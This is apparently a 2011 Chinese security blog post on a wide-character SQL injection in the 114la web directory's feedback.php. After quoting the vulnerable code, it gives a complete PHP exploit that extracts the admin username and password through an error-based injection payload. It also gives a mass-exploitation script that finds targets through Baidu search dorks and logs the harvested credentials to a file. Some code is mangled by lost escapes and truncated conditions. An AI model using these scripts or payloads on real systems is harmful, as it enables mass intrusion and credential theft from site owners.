114啦网址导航留言本注入 - 脚本漏洞

  • A+
所属分类:lcx

    漏洞文件 feedback/feedback.php

    影响版本

以下是引用片段:

$username = empty($_POST['username']) ? '' : strip_tags(iconv('UTF-8', 'GBK', $_POST['username']));
    $email = (isset($_POST['email'])) ? strip_tags(iconv('UTF-8', 'GBK', $_POST['email'])) : '';
    $content = (isset($_POST['content'])) ? trim(iconv('UTF-8', 'GBK', $_POST['content'])) : '';
    (empty($content)) && $error_msg .= ',意见及建议 ';

    if (!empty($error_msg))
    {
        throw new Exception($error_msg, 11);
    }

    $content = htmlspecialchars($content, ENT_QUOTES);
    if (strlen($content) > 600 || strlen($content)
    {
        throw new Exception('请将您的描述控制在  20 - 300 字,更多内容请您分次提交。', 1);
    }

    // 验证次数
    $old_cookie = (isset($_COOKIE['fdnum'])) ? (int)$_COOKIE['fdnum'] : 0;
    if ($old_cookie >= SUBMIT_ONE_DAY)
    {
        throw new Exception('抱歉,24 小时内您只能提交  ' . SUBMIT_ONE_DAY . ' 次反馈信息。谢谢合作!', 2);
    }
    $old_cookie++;

    if (false === app_db::insert('ylmf_feedback', array('username', 'email', 'content', 'add_time'),
                                                 array($username, $email, $content, time())))
    {
        throw new Exception('抱歉,信息提交失败,请重试。', 1);
    }
    else
    {
        // 记录提交次数
        if ($old_cookie > SUBMIT_ONE_DAY || !isset($_COOKIE['fdstime']) || $_COOKIE['fdstime']
        {
            setcookie('dfstime', time(), time() + 86400);
            setcookie('fdnum', $old_cookie, time() + 86400);
        }
        else
        {
            setcookie('fdnum', $old_cookie, time() + 86400 - (time() - $_COOKIE['fdstime']));
        }

        throw new Exception('

提交成功,感谢您的反馈! 返回首页

', 3);
        unset($username, $email, $content);
    }

    $username、$email、$content强制转换GBK编码但是均未过滤直接insert   构造UTF8宽字符形成宽字符注入

Exp:

$sbcopyright='
----------------------------------------
114la feedback injection Vul Exploit
By xZL
Team: www.0kee.com
2011.04.02

Usage: php '.$argv[0].' host /path
Example: php '.$argv[0].' 127.0.0.1 /
----------------------------------------
';
if ($argc
print_r($sbcopyright);
die();
}

ob_start();
$url = $argv[1];
$path= $argv[2];

$sock = fsockopen("$url", 80, $errno, $errstr, 30);
if (!$sock) die("$errstr ($errno)n");
$data = "username=0kee%E7%B8%97'&email=,0,(select%201%20from%20(select%20count(*),concat((SELECT%20concat(name,0x5f,password)%20FROM%20ylmf_admin_user limit 0,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a),2)#&content=~~~~~this is a test from 0kee security team~~~~~";

fwrite($sock, "POST $path/feedback/feedback.php HTTP/1.1rn");
fwrite($sock, "Accept: */*rn");
fwrite($sock, "Referer: http://$url/#Mrn");
fwrite($sock, "Accept-Language: zh-cnrn");
fwrite($sock, "Content-Type: application/x-www-form-urlencodedrn");
fwrite($sock, "Accept-Encoding: gzip, deflatern");
fwrite($sock, "User-Agent: Mozillarn");
fwrite($sock, "Host: $urlrn");
fwrite($sock, "Content-Length: ".strlen($data)."rn");
fwrite($sock, "Connection: Keep-Alivern");
fwrite($sock, "Cache-Control: no-cachern");
fwrite($sock, "Cookie:ASPSESSIONIDASDRRBRA=MFILAMMAENMDGAPJLLKPEAONrnrn");
fwrite($sock, $data);

$headers = "";
while ($str = trim(fgets($sock, 4096)))
     $headers .= "$strn";
echo "n";
$body = "";
while (!feof($sock))
     $body .= fgets($sock, 4096);

fclose($sock);

if (strpos($body, 'Duplicate entry') !== false) {
preg_match('/Duplicate entry '(.*)1'/', $body, $arr);
$result=explode("_",$arr[1]);
print_r("Exploit Success! nusername:".$result[0]."npassword:".$result[1]."nGood Luck!");
}else{
print_r("Exploit Failed! n");
}

ob_end_flush();
?>

    再发一个批量注入的吧!! c:shell.txt  记录

批量注入:

error_reporting(E_ERROR);
$print="
-----------------------------------------
-  114la feedback injection Vul Exploit -
-  By xZL                               -
-  Team:

                   -
-  2011.04.02                           -
-----------------------------------------
-  by [email][email protected][/email]                  -
-----------------------------------------
";
print_r($print);
$keyword = '网站提交 inurl:/url-submit/';//百度搜索关键字
print_r ("
[-]  keyword : $keyword
");
$fp = @fopen("c:shell.txt", 'a');
@fwrite($fp, "$print");
@fclose($fp);
$timeout = 10; //读取网页超时(秒)
$stratpage = 1; //读取百度起始页
$lastpage = 100; //读取百度尾页
for ( $i>=0 ; $i
$array=ReadBaiduList($keyword,$timeout,$i);
//print_r ($array);
foreach ($array as $url ){
print_r("
[*]  Sql Injection $urlrn");
$fp = @fopen("c:shell.txt", 'a');
@fwrite($fp, "rnHost:$url");
@fclose($fp);
exploit($url);

                }
                }
function exploit($url,$path){
ob_start();
$sock = fsockopen("$url", 80, $errno, $errstr, 30);
if (!$sock) die("$errstr ($errno)n");
$data = "username=0kee%E7%B8%97'&email=,0,(select%201%20from%20(select%20count(*),concat((SELECT%20concat(name,0x5f,password)%20FROM%20ylmf_admin_user limit 0,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a),2)#&content=~~~~~this is a test from 0kee security team~~~~~";

fwrite($sock, "POST $path/feedback/feedback.php HTTP/1.1rn");
fwrite($sock, "Accept: */*rn");
fwrite($sock, "Referer: http://$url/#Mrn");
fwrite($sock, "Accept-Language: zh-cnrn");
fwrite($sock, "Content-Type: application/x-www-form-urlencodedrn");
fwrite($sock, "Accept-Encoding: gzip, deflatern");
fwrite($sock, "User-Agent: Mozillarn");
fwrite($sock, "Host: $urlrn");
fwrite($sock, "Content-Length: ".strlen($data)."rn");
fwrite($sock, "Connection: Keep-Alivern");
fwrite($sock, "Cache-Control: no-cachern");
fwrite($sock, "Cookie:ASPSESSIONIDASDRRBRA=MFILAMMAENMDGAPJLLKPEAONrnrn");
fwrite($sock, $data);

$headers = "";
while ($str = trim(fgets($sock, 4096)))
     $headers .= "$strn";
echo "n";
$body = "";
while (!feof($sock))
     $body .= fgets($sock, 4096);

fclose($sock);

if (strpos($body, 'Duplicate entry') !== false) {
preg_match('/Duplicate entry '(.*)1'/', $body, $arr);
$result=explode("_",$arr[1]);
print_r("Exploit Success! nusername:".$result[0]."npassword:".$result[1]."nGood Luck!");
$fp = @fopen("c:shell.txt", 'a');
@fwrite($fp, "rn $result[0]-------$result[1]");
@fclose($fp);
}else{
print_r("Exploit Failed! n");
$fp = @fopen("c:shell.txt", 'a');
@fwrite($fp, "Exploit Failed!");
@fclose($fp);
}
ob_end_flush();
}

function ReadBaiduList($keyword,$timeout,$nowpage) //返回网址列表Array
{
$tmp = array();
//$data = '';
$nowpage = ($nowpage-1)*10;
$fp = @fsockopen('www.baidu.com',80,$errno,$errstr,$timeout);
@fputs($fp,"GET /s?wd=".urlencode($keyword)."&pn=".$nowpage." HTTP/1.1rnHost:

rnConnection: Closernrn");
while ($fp && !feof($fp))
$data .= fread($fp, 1024);
@fclose($fp);
preg_match_all("/})" href="http://([^~]*?)" target="_blank"/i",$data,$tmp);
$num = count($tmp[1]);
$array = array();
for($i = 0;$i
{
$row = explode('/',$tmp[1][$i]);
$array[] = str_replace('http://','',$row[0]);
}
return $array;
}

?>

114啦网址导航留言本注入 - 脚本漏洞

文章来源于lcx.cc:114啦网址导航留言本注入 - 脚本漏洞

相关推荐: T00ls.Net 碰到个有意思的帖子,端口数能否超过65535?

原帖内容如下:     标题:谁把终端改成了高端口?,作者:ddoop。     碰到一棒子的服务器~3389端口变成了78650     通常服务器的端口都是1-65535他来个顶你肺啊78650。。。情况如下     害我都连接不上桌面.奇怪的是~~que…

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: